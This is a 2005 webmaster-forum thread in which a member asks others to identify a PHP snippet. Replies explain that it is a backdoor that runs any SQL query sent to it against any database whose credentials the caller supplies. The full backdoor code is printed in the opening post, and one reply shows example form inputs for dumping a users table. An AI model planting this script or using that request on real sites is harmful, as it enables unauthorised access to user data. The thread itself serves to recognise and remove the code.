|
|
|
|
||||
|
Welcome to the GoFuckYourself.com - Adult Webmaster Forum forums. You are currently viewing our boards as a guest which gives you limited access to view most discussions and access our other features. By joining our free community you will have access to post topics, communicate privately with other members (PM), respond to polls, upload content and access many other special features. Registration is fast, simple and absolutely free so please, join our community today! If you have any problems with the registration process or your account login, please contact us. |
 |
|
|||||||
| Discuss what's fucking going on, and which programs are best and worst. One-time "program" announcements from "established" webmasters are allowed. |
|
|
Thread Tools |
04-01-2005, 07:13 PM
|
#1 |
|
Confirmed User
Industry Role:
Join Date: Jul 2003
Location: Neural Network
Posts: 855
|
programmers alert: identify this php code please
tell me what this code is supposed to do:
<?php if (ini_get('register_globals') != '1') { /* We'll register the variables as globals: */ if (!empty($HTTP_POST_VARS)) extract($HTTP_POST_VARS); if (!empty($HTTP_GET_VARS)) extract($HTTP_GET_VARS); if (!empty($HTTP_SERVER_VARS)) extract($HTTP_SERVER_VARS); } $lnk = mysql_connect($host,$user,$pass); echo "<hr>Begin\n"; if ($query) { $testquery = stripslashes($query); mysql_select_db($database, $lnk); $result = mysql_query($testquery) or die("Query failed : " . mysql_error()); while ($line = mysql_fetch_array($result, MYSQL_ASSOC)) { foreach ($line as $col_value) { echo "$col_value\t"; } echo "\n"; } } die ("<hr>End"); ?>
__________________
|
|
|
|
04-01-2005, 07:26 PM
|
#2 |
|
Confirmed User
Join Date: Oct 2002
Posts: 252
|
It checks firstly if register_globals is set, if not, it programatically sets it so that query/POST variables are set to normal variables.
It then connects to the host specified in the parameters and executes the query specified in the parameters and returns the result set from it. Ultimately, it's to execute a query on a specified host remotely. |
|
|
|
|
04-03-2005, 02:41 AM
|
#3 |
|
So Fucking Banned
Join Date: Jan 2005
Location: At My Desk
Posts: 2,904
|
php coders
looks like it needs 3 more php coders to remove the redundancy problem the first php coder created
 |
|
|
|
|
04-03-2005, 03:03 AM
|
#4 |
|
Damn Right I Kiss Ass!
Industry Role:
Join Date: Dec 2003
Location: Cowtown, USA
Posts: 32,409
|
It is basically a backdoor directly into your mysql...
|
|
|
|
|
04-03-2005, 03:30 AM
|
#5 |
|
Confirmed User
Join Date: Feb 2004
Posts: 392
|
Delete it!!
What ever it's used for ... it's one big backdoor ... 
__________________
.... 
|
|
|
|
|
04-03-2005, 03:42 AM
|
#6 |
|
Confirmed User
Join Date: Feb 2002
Location: ICQ: 251425 Fr/Au/Ca
Posts: 6,863
|
There's a lot of redundant code to pass a query straight to your database.
Bad, bad, bad. |
|
|
|
|
04-03-2005, 07:08 AM
|
#7 |
|
Confirmed User
Join Date: May 2002
Location: MI
Posts: 1,827
|
As everyone else has said, it looks to see if it registers the variables globally (ie., takes a query string like ?info=123123 and sets it to $info automatically. If not, the extract function does so, then he is connecting to a db (and could easily pass $user,$pass,$host variables to connect right to your database, same with a $query string, for example:
He could send a post request with the variables needed.. <input type="user" value="mysql_username"> <input type="pass value="mysql_pass"> <input type="host" value="mysql_host"> <input type="query" value="SELECT * FROM your_users_table"> It would then return all your data in a tab delimited format when he submitted it. It its a HUGE backdoor to your db and to ANY db on your system as long as he has a user/pass for it. For that matter it could access any DB in the world as long as it was allowing your host to connect to the remote DB. It could even be used to hide their tracks if they were a hacker. Throw that on someone else's server and use it to gain access to another person's db so they don track it down. Its just an all around BAD script.
__________________
Latest MMA news. http://www.mmawrapup.com |
|
|
|
|
04-03-2005, 07:21 AM
|
#8 |
|
Confirmed User
Join Date: Aug 2003
Posts: 1,798
|
somebody wants to hump your site hehehe
__________________
TGP Webmasters: sign up for the top 100 tgp list! Submit galleries If you add me to icq (title) make sure to mention GFY or I'll think you're a bot and deny you. |
|
|
|
|
04-03-2005, 07:30 AM
|
#9 |
|
Confirmed User
Join Date: Feb 2005
Posts: 283
|
yep, a backdoor for sure, too bad it wouldnt display the info properly though
|
|
|
|
|
04-03-2005, 08:19 AM
|
#10 |
|
Porn Meister
Industry Role:
Join Date: Feb 2005
Posts: 16,443
|
I prefer flat files.
__________________
43-922-863 Shut up and play your guitar. 
|
|
|
|
|
04-03-2005, 08:30 AM
|
#11 | |
|
Choice is an Illusion
Industry Role:
Join Date: Feb 2005
Location: Land of Obama
Posts: 42,635
|
Quote:
 |
|
|
|
|
|
04-04-2005, 02:04 PM
|
#12 |
|
So Fucking Banned
Join Date: Aug 2003
Location: San Diego, CA
Posts: 5,464
|
Very stupid code, I would delete it from whatever script you found it in
|
|
|
|
|
04-04-2005, 02:07 PM
|
#13 |
|
Confirmed User
Join Date: May 2001
Location: San Diego
Posts: 1,642
|
Before you delete it, where did you find that code in?
__________________
We are what we repeatedly do.-Aristotle |
|
|
|
|
04-04-2005, 02:10 PM
|
#14 |
|
FBOP Class Of 2013
Industry Role:
Join Date: Jan 2004
Location: bumfuck, ky
Posts: 35,562
|
looks like code from an old version of oscommerce before they did away with that register globals shit
|
|
|
|
